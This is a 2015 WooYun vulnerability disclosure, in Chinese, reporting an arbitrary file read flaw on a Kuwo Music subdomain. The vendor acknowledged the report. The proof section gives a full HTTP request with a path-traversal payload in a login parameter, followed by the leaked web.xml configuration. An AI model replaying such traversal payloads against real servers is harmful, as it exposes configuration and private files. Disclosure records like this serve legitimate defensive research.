当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-099317
漏洞标题:
酷我音乐某站任意文件读取
相关厂商:
酷我音乐
漏洞作者:
Forever80s
提交时间:
2015-03-03 20:46
修复时间:
2015-04-17 20:48
公开时间:
2015-04-17 20:48
漏洞类型:
任意文件遍历/下载
危害等级:
自评Rank:
20
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-04: 厂商已经确认,细节仅向厂商公开
2015-03-14: 细节向核心白帽子及相关领域专家公开
2015-03-24: 细节向普通白帽子公开
2015-04-03: 细节向实习白帽子公开
2015-04-17: 细节向公众公开

简要描述:

详细说明:

漏洞证明:

网站:mc.kuwo.cn
任意文件读取遍历,我们来读取web.xml

POST /g/st/WulinLogin HTTP/1.1
Referer: http://mc.kuwo.cn/g/jsp/mingchao/zc.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: mc.kuwo.cn
Content-Length: 65
Accept-Encoding: gzip, deflate
fromwhere=..%2fWEB-INF%2fweb.xml%3bx%3d&username=&password=&code=


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 21 Feb 2015 11:34:40 GMT
Content-Type: application/xml;charset=utf-8
Content-Length: 173237
Connection: keep-alive
Last-Modified: Thu, 05 Feb 2015 03:46:27 GMT
X-Cache: MISS from 74localhost.localdomain
Vary: Accept-Encoding
<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.4" 
	xmlns="http://java.sun.com/xml/ns/j2ee" 
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
	xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee 
	http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
	<!--  
	<servlet>
         <servlet-name>jsp</servlet-name>
         <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class>
         <init-param>
             <param-name>fork</param-name>
             <param-value>false</param-value>
         </init-param>
         <init-param>
             <param-name>xpoweredBy</param-name>
             <param-value>false</param-value>
         </init-param>
        <init-param>
            <param-name>trimSpaces</param-name>
            <param-value>true</param-value>
         </init-param>
         <load-on-startup>1</load-on-startup>
   </servlet>
    -->
  <servlet>
    <description>JumpDiguoServlet</description>
    <display-name>JumpDiguoServlet</display-name>
    <servlet-name>JumpDiguoServlet</servlet-name>
    <servlet-class>com.koowo.game.w51wan.diguo.JumpDiguoServlet</servlet-class>
  </servlet>
  <servlet> 
    <description>JumpLuanwuServlet</description>
    <display-name>JumpLuanwuServlet</display-name>
    <servlet-name>JumpLuanwuServlet</servlet-name>
    <servlet-class>com.koowo.game.w51wan.luanwu.JumpLuanwuServlet</servlet-class>
  </servlet>
  <servlet>
    <description>InitServlet</description>
    <display-name>InitServlet</display-name>
    <servlet-name>InitServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.InitServlet</servlet-class>
  </servlet>
  <servlet>
    <description>JumpQilongServlet</description>
    <display-name>JumpQilongServlet</display-name>
    <servlet-name>JumpQilongServlet</servlet-name>
    <servlet-class>com.koowo.game.duniu.qilong.JumpQilongServlet</servlet-class>
  </servlet>
  <servlet>
    <description>UserLogin51wanServelt</description>
    <display-name>UserLogin51wanServelt</display-name>
    <servlet-name>UserLogin51wanServelt</servlet-name>
    <servlet-class>com.koowo.game.w51wan.UserLogin51wanServelt</servlet-class>
  </servlet>
  <servlet>
    <description>IndexServlet</description>
    <display-name>IndexServlet</display-name>
    <servlet-name>IndexServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.IndexServlet</servlet-class>
  </servlet>
  <servlet>
    <description>AllAn</description>
    <display-name>AllAn</display-name>
    <servlet-name>AllAn</servlet-name>
    <servlet-class>com.koowo.game.servlet.AllAnServlet</servlet-class>
  </servlet>
  <servlet>
    <description>GameAn</description>
    <display-name>GameAn</display-name>
    <servlet-name>GameAn</servlet-name>
    <servlet-class>com.koowo.game.servlet.GameAnServlet</servlet-class>
  </servlet>
  <servlet>
    <description>An</description>
    <display-name>An</display-name>
    <servlet-name>AnServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.AnServlet</servlet-class>
  </servlet>
  <servlet>
    <description>AllGame</description>
    <display-name>AllGame</display-name>
    <servlet-name>AllGameServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.AllGameServlet</servlet-class>
  </servlet>
  <servlet>
    <description>Game</description>
    <display-name>Game</display-name>
    <servlet-name>GameServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.GameServlet</servlet-class>
  </servlet>
  <servlet>
    <description>JumpSanguoServlet</description>
    <display-name>JumpSanguoServlet</display-name>
    <servlet-name>JumpSanguoServlet</servlet-name>
    <servlet-class>com.koowo.game.kunlun.sanguo.JumpSanguoServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>JumpJianxia</servlet-name>
    <servlet-class>com.koowo.game.w51wan.jianxia.JumpJianxiaServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>JumpWulinServlet</servlet-name>
    <servlet-class>com.koowo.game.w9wee.wulin.JumpWulinServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>wulinIndexServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.wulin.IndexServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>AllNewsServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.AllNewsServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>FresherGuideServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.FresherGuideServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>ZiLiaoServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.ZiLiaoServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>DirectSignServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.DirectSignServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>ShowContentServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.ShowContentServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>NewIndexServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.NewIndexServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>EntryServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.EntryServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>WulinLoginServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.wulin.WulinLoginServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>CheckUserNameServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.CheckUserNameServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>HuoDongServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.HuoDongServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>GongLueServlet</servlet-name>
    <servlet-class>com.koowo.game.servlet.GongLueServlet</servlet-class>
  </servlet>
  <servlet>
    <servlet-name>rexueIndexServlet</servlet-name>
敏感省略。。。


可遍历

修复方案:

版权声明:转载请注明来源 Forever80s@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-03-04 09:43

厂商回复:

多谢对酷我的支持

最新状态:

暂无